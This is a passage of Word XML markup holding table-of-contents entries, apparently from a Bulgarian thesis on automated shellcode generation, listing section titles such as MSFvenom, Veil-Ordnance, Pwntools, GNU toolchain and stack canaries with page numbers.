                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc3540779 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>34</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00C23AD4" w:rsidRDefault="00C23AD4">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1320"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9019"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:lang w:val="en-US"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc3540780" w:history="1">
            <w:r w:rsidRPr="00BA17AD">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w14:scene3d>
                  <w14:camera w14:prst="orthographicFront"/>
                  <w14:lightRig w14:rig="threePt" w14:dir="t">
                    <w14:rot w14:lat="0" w14:lon="0" w14:rev="0"/>
                  </w14:lightRig>
                </w14:scene3d>
              </w:rPr>
              <w:t>2.6.4.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00BA17AD">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>“Two’s complement”</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc3540780 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>36</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00C23AD4" w:rsidRDefault="00C23AD4">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9019"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:lang w:val="en-US"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc3540781" w:history="1">
            <w:r w:rsidRPr="00BA17AD">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3. Трета глава Автоматизирано създаване на shellcode</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc3540781 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>37</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00C23AD4" w:rsidRDefault="00C23AD4">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="880"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9019"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:lang w:val="en-US"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc3540782" w:history="1">
            <w:r w:rsidRPr="00BA17AD">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.1.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00BA17AD">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Съществуващи решения</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc3540782 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>37</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00C23AD4" w:rsidRDefault="00C23AD4">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1320"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9019"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:lang w:val="en-US"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc3540783" w:history="1">
            <w:r w:rsidRPr="00BA17AD">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w14:scene3d>
                  <w14:camera w14:prst="orthographicFront"/>
                  <w14:lightRig w14:rig="threePt" w14:dir="t">
                    <w14:rot w14:lat="0" w14:lon="0" w14:rev="0"/>
                  </w14:lightRig>
                </w14:scene3d>
              </w:rPr>
              <w:t>3.1.1.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00BA17AD">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>MSFvenom</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc3540783 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>37</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00C23AD4" w:rsidRDefault="00C23AD4">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1320"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9019"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:lang w:val="en-US"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc3540784" w:history="1">
            <w:r w:rsidRPr="00BA17AD">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w14:scene3d>
                  <w14:camera w14:prst="orthographicFront"/>
                  <w14:lightRig w14:rig="threePt" w14:dir="t">
                    <w14:rot w14:lat="0" w14:lon="0" w14:rev="0"/>
                  </w14:lightRig>
                </w14:scene3d>
              </w:rPr>
              <w:t>3.1.2.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00BA17AD">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Veil-Ordnance</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc3540784 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>40</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00C23AD4" w:rsidRDefault="00C23AD4">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1320"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9019"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:lang w:val="en-US"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc3540785" w:history="1">
            <w:r w:rsidRPr="00BA17AD">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w14:scene3d>
                  <w14:camera w14:prst="orthographicFront"/>
                  <w14:lightRig w14:rig="threePt" w14:dir="t">
                    <w14:rot w14:lat="0" w14:lon="0" w14:rev="0"/>
                  </w14:lightRig>
                </w14:scene3d>
              </w:rPr>
              <w:t>3.1.3.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00BA17AD">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Pwntools</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc3540785 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>41</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00C23AD4" w:rsidRDefault="00C23AD4">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="880"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9019"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:lang w:val="en-US"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc3540786" w:history="1">
            <w:r w:rsidRPr="00BA17AD">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.2.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00BA17AD">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Използвани на инструменти</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc3540786 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>41</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00C23AD4" w:rsidRDefault="00C23AD4">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1320"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9019"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:lang w:val="en-US"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc3540787" w:history="1">
            <w:r w:rsidRPr="00BA17AD">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w14:scene3d>
                  <w14:camera w14:prst="orthographicFront"/>
                  <w14:lightRig w14:rig="threePt" w14:dir="t">
                    <w14:rot w14:lat="0" w14:lon="0" w14:rev="0"/>
                  </w14:lightRig>
                </w14:scene3d>
              </w:rPr>
              <w:t>3.2.1.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00BA17AD">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>python 3</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc3540787 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>41</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00C23AD4" w:rsidRDefault="00C23AD4">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1320"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9019"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:lang w:val="en-US"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc3540788" w:history="1">
            <w:r w:rsidRPr="00BA17AD">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w14:scene3d>
                  <w14:camera w14:prst="orthographicFront"/>
                  <w14:lightRig w14:rig="threePt" w14:dir="t">
                    <w14:rot w14:lat="0" w14:lon="0" w14:rev="0"/>
                  </w14:lightRig>
                </w14:scene3d>
              </w:rPr>
              <w:t>3.2.2.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00BA17AD">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>GNU toolchain</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc3540788 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>42</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00C23AD4" w:rsidRDefault="00C23AD4">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1320"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9019"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:lang w:val="en-US"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc3540789" w:history="1">
            <w:r w:rsidRPr="00BA17AD">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w14:scene3d>
                  <w14:camera w14:prst="orthographicFront"/>
                  <w14:lightRig w14:rig="threePt" w14:dir="t">
                    <w14:rot w14:lat="0" w14:lon="0" w14:rev="0"/>
                  </w14:lightRig>
                </w14:scene3d>
              </w:rPr>
              <w:t>3.2.3.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00BA17AD">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Диалект на асемблер</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc3540789 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>42</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00C23AD4" w:rsidRDefault="00C23AD4">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="880"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9019"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:lang w:val="en-US"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc3540790" w:history="1">
            <w:r w:rsidRPr="00BA17AD">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.3.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00BA17AD">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Изключване на защити</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc3540790 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>42</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00C23AD4" w:rsidRDefault="00C23AD4">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1320"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9019"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:lang w:val="en-US"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc3540791" w:history="1">
            <w:r w:rsidRPr="00BA17AD">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
                <w14:scene3d>
                  <w14:camera w14:prst="orthographicFront"/>
                  <w14:lightRig w14:rig="threePt" w14:dir="t">
                    <w14:rot w14:lat="0" w14:lon="0" w14:rev="0"/>
                  </w14:lightRig>
                </w14:scene3d>
              </w:rPr>
              <w:t>3.3.1.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00BA17AD">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Канарче</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc3540791 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
